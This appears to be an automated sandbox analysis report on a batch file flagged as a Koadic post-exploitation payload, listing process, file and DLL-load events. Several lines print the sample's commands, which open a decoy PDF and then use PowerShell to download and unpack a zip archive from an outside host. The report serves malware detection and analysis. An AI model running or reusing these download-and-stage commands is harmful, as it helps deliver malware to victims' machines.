Source: type.html.16.dr, stable.html.16.dr, tty.html.16.dr, zipfile.html.16.dr, index.html7.16.dr, capsule.html.16.dr, xml.sax.utils.html.16.dr, isolating-extensions.html.16.dr, editors.html.16.dr, unittest.mock.html.16.dr, list.html.16.dr, errors.html.16.dr, genindex-S.html.16.dr, set.html.16.dr, long.html.16.dr, xmlrpc.server.html.16.dr, zipapp.html.16.dr, exceptions.html.16.dr, wave.html.16.dr, apiabiversion.html.16.dr, library.html.16.drString found in binary or memory: https://www.sphinx-doc.org/
Source: mac.html.16.drString found in binary or memory: https://www.tcl.tk
Source: mac.html.16.drString found in binary or memory: https://www.wxpython.org
Source: zlib.html.16.drString found in binary or memory: https://www.zlib....
Source: zlib.html.16.drString found in binary or memory: https://www.zlib.net
Source: 2.2.html.16.drString found in binary or memory: https://www2.cs.arizona.edu/icon/
Source: 2.2.html.16.drString found in binary or memory: https://www2.cs.arizona.edu/icon/docs/ipd266.htm
Source: 2.3.html.16.drString found in binary or memory: https://xlinux.nist.gov/dads//HTML/priorityque.html
Source: zlib.html.16.drString found in binary or memory: https://zlib.net/zlib_faq.html#faq33

System Summary

barindex
Source: new.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: new.batStatic file information: 19922944
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: new.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal64.winBAT@25/1083@0/2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.8108Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-08-28 12-59-27-394.logJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DTBZGIOOSO.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2236 --field-trial-handle=1508,i,1077775855205857416,457621313890120960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DTBZGIOOSO.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DesusertionPath 'C:\Users\user\Downloads' -Force }"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2236 --field-trial-handle=1508,i,1077775855205857416,457621313890120960,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: new.batStatic file information: File size 19922944 > 1048576
Source: Binary string: <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file.</p></li> source: 3.2.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor now accepts a <em>nosigint</em> argument.</p></li> source: 3.2.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-R.html.16.dr
Source: Binary string: <li><p>A <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> script file can contain <code class="docutils literal notranslate"><span class="pre">continue</span></code> and <code class="docutils literal notranslate"><span class="pre">next</span></code> commands source: 3.2.html.16.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipqng.site:5502/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
